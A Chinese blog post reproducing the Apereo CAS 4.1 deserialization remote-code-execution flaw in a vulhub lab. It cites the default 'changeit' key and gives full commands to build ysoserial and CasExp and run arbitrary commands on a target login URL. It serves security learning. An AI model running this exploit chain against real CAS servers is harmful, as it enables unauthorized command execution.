Apereo CAS 4.1 反序列化漏洞复现

最新推荐文章于 2024-06-21 09:35:55 发布
最新推荐文章于 2024-06-21 09:35:55 发布
阅读量1.9k 收藏 5
点赞数 1
分类专栏: 渗透测试 文章标签: Apereo CAS 反序列化 命令执行 Apereo CAS 反序列化 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43571641/article/details/108253852
版权

PS:欢迎访问我的个人博客 http://luckyzmj.cn

0x01 漏洞简介

Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。

  • 影响版本 Apereo CAS <= 4.1.7

0x02 环境准备

使用vulhub复现漏洞环境。

  • vulhub官网地址:https://vulhub.org
cd vulhub/apereo-cas/4.1-rce
docker-compose up -d

环境启动后,访问http://your-ip:8080/cas/login即可查看到登录页面。

0x03 漏洞检测

该漏洞存在于登录的execution参数,使用Burp抓包可以发现该参数值。

0x04 漏洞利用

漏洞原理是Webflow中使用了默认密钥changeit:

public class EncryptedTranscoder implements Transcoder {
    private CipherBean cipherBean;
    private boolean compression = true;

    public EncryptedTranscoder() throws IOException {
        BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
        bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
        bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
        bufferedBlockCipherBean.setKeyAlias("aes128");
        bufferedBlockCipherBean.setKeyPassword("changeit");
        bufferedBlockCipherBean.setNonce(new RBGNonce());
        this.setCipherBean(bufferedBlockCipherBean);
    }

    // ...

安装攻击利用工具

1、安装 jdk 1.8 ,配置好系统环境变量

2、安装 maven ,配置好系统环境变量

3、下载 ysoserial.jar 到 maven 安装目录下

链接:https://pan.baidu.com/s/1nnmBKyQ6rSIzNrmeH5yEaA 
提取码:qx80

4、安装 ysoerial.jar 到本地 maven

mvn org.apache.maven.plugins:maven-install-plugin:2.5.2:install-file -Dfile=ysoserial.jar -DgroupId=ysoserial -DartifactId=ysoserial -Dversion=0.0.6 -Dpackaging=jar -DlocalRepositoryPath=my-repo

5、下载 CasExp 项目源码到本地

git clone https://github.com/potats0/CasExp.git

6、打包CasExp源码为jar格式可执行文件

mvn clean package assembly:single

7、打包好的jar文件在 \CasExp-master\target 目录下

使用打包好的CasExp进行远程命令执行

#工具命令格式:
java -jar CasPoc-1.0-SNAPSHOT-jar-with-dependencies.jar http://your-ip:8080/cas/login "执行的命令"

#工具命令示例:
java -jar CasPoc-1.0-SNAPSHOT-jar-with-dependencies.jar http://192.168.126.130:8080/cas/login "uname -a"

参考文章

  • https://apereo.github.io/2016/04/08/commonsvulndisc/
  • https://github.com/vulhub/vulhub/blob/master/apereo-cas/4.1-rce/README.zh-cn.md
  • https://github.com/potats0/CasExp/blob/master/readme.md
Luckysec
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
Apereo CAS 4.1 序列 RCE 漏洞实验报告
weixin_48400575的博客
01-25 3166
演示视频 Apereo CAS 4.1 序列 RCE 漏洞_哔哩哔哩_bilibiliBGM:《芳华慢》+《霜雪千年》(by等什么君)https://www.bilibili.com/video/BV16Y411b7T8/ 参考文章 https://vulhub.org/#/environments/apereo-cas/4.1-rce/ Apereo-cas 4.1 序列 RCE 漏洞_菜鸟的学习笔记-CSDN博客Apereo-cas 4.1 序列 RCE 漏洞一. 环境搭建使用vul
Apereo-cas序列漏洞
weixin_50464560的博客
04-01 1777
1.简介 参考链接: 项目地址:https://github.com/apereo/cas 官网:CAS - Home 简介:Apereo CAS 单点登录系统使用介绍 · dataviz CAS 全称是Central Authentication Service(中心认证服务),它是一个单点登录(Single-Sign-On)协议,Apereo CAS是实该协议的软件包,且Apereo CAS是目前Java服务器环境下使用最为广泛的单点登录系统。 2|0Apereo CAS 4.1 序列
CAS远程代码执行检测工具:硬编码漏洞克星
最新发布
gitblog_00014的博客
06-21 428
CAS远程代码执行检测工具:硬编码漏洞克星 项目地址:https://gitcode.com/langligelang/CAS_EXP 1、项目介绍 这个开源项目是一个专门针对CAS(Central Authentication Service)系统中的硬编码远程代码执行漏洞的检测工具。它的目标是帮助管理员及时发并修该安全风险,以保护系统的稳定性与安全性。该工具简单易用,只需一条命令即可运行,...
Apereo CAS 4.1.X 序列漏洞
DaWan
09-20 981
Apereo CAS 序列漏洞环境搭建漏洞 影响范围: Apereo CAS <= 4.1.7 工具下载: https://github.com/vulhub/Apereo-CAS-Attack/releases 环境搭建 使用vulhub进行环境搭建 漏洞 使用ysoserial的CommonsCollections4生成加密后的Payload: java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 “
Apereo CAS 4.1 序列漏洞
黑白的博客
12-21 1186
声明 好好学习,天天向上 漏洞描述 Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标序列漏洞,进而执行任意命令。 影响范围 Apereo CAS <= 4.1.7 过程 这里使用4.1.5版本 使用vulhub cd /app/vulhub-master/apereo-cas/4.1-rce 使用docker启动 docker-compose build doc
Apereo CAS 4.1 序列 RCE 漏洞漏洞
weixin_56537388的博客
11-09 319
Apereo CAS 是一个企业单点登录系统。CAS 尝试通过 Apache Commons Collections 库序列对象时存在问题,这导致了 RCE 漏洞
Apereo CAS 4.1 序列命令执行漏洞
HEAVEN569的博客
06-21 380
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标序列漏洞,进而执行任意命令。...
Apereo CAS 4.1/4.x 序列RCE漏洞 漏洞
ADummy的博客
02-20 1982
Apereo CAS 4.1序列RCE漏洞 by ADummy 0x00利用路线 ​ 构造(可以使用ysoserial)可执行命令的序列对象—>发送给目标61616端口—>访问web管理页面,读取消息,触发漏洞—>代码执行 0x01漏洞介绍 ​ Apereo CAS是企业级单点登录系统。CAS试图通过Apache Commons Collections库对对象进行序列的过程中存在一个问题,该案例引起了RCE漏洞Apereo Cas一般是用来做身份认证的,所以有一定的攻击
【vulhub】Apereo CAS 4.1 序列命令执行漏洞
qq_45300786的博客
09-12 672
楼主困了,这里就直接写上楼主自己的一些操作 详细过程可以看Apereo CAS 4.1 序列命令执行漏洞 一、先跑下目录 二、生成payload http://www.jackson-t.ca/runtime-exec-payloads.html 工具链接:https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar 三、dnslog回显 ja
Apereo CAS 4.1 序列命令执行漏洞
qq_42252522的博客
08-07 976
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标序列漏洞,进而执行任意命令。...
Java序列漏洞利用工具.zip
04-10
Java序列漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列序列过程中的安全问题。序列是将对象状态转换为可存储或传输的数据格式的过程,而序列则是将这些数据恢为原来的对象...
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
11-11
Java序列漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查...
Shiro序列漏洞检测工具
01-05
在Shiro的早期版本中,尤其是1.2.4及以下版本,存在一个严重的序列漏洞,这个漏洞可能导致远程代码执行(RCE)的风险,攻击者可以利用这个漏洞对目标系统进行非法操作。 序列漏洞通常出在应用程序接收到...
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:序列漏洞序列漏洞通常出在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
webpack 源码泄露
热门推荐
LuckySec
12-03 1万+
webpack是一个JavaScript应用程序的静态资源打包器(module bundler)。它会递归构建一个依赖关系图(dependency graph),其中包含应用程序需要的每个模块,然后将所有这些模块打包成一个或多个bundle。大部分Vue等项目应用会使用webpack进行打包,如果没有正确配置,就会导致项目源码泄露,可能泄露的各种信息如API、加密算法、管理员邮箱、内部功能等等。
跨域资源共享CORS漏洞
LuckySec
08-22 1万+
0x01 漏洞简介 跨域资源共享(CORS)是一种放宽同源策略的机制,它允许浏览器向跨源服务器,发出 XMLHttpRequest 请求,从而克服了 AJAX 只能同源使用的限制,以使不同的网站可以跨域获取数据,目前已经被绝大多数浏览器支持,并被主流网站广泛部署使用。跨域资源共享 CORS 漏洞主要是由于程序员配置不当,对于 Origin 源校验不严格,从而造成跨域问题,攻击者可以利用 CORS 错误配置漏洞,从恶意网站跨域读取受害网站的敏感信息。 这里只做简单介绍,关于 CORS 漏洞的详细分析可以点击
Redis未授权访问+弱口令检测+getShell漏洞
LuckySec
08-23 8272
PS:欢迎访问我的个人博客 http://luckyzmj.cn 0x01 漏洞简介 redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。 Redis未授权访问在4.x/5.0.5以前版本下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。 影响版本 Redis 4.x/5.0.5以前版本 0x02 环境准备 漏洞环境使用vulhub相当方便。 vulhub官网地址:ht
fastjson序列漏洞过程
04-19
下面是fastjson序列漏洞过程[^1][^2]: 1. 判断是否使用Fastjson以及Fastjson版本:首先需要确定目标系统是否使用了Fastjson,并且确定Fastjson的版本号。可以通过查看项目的依赖文件或者代码中的导入...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Luckysec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值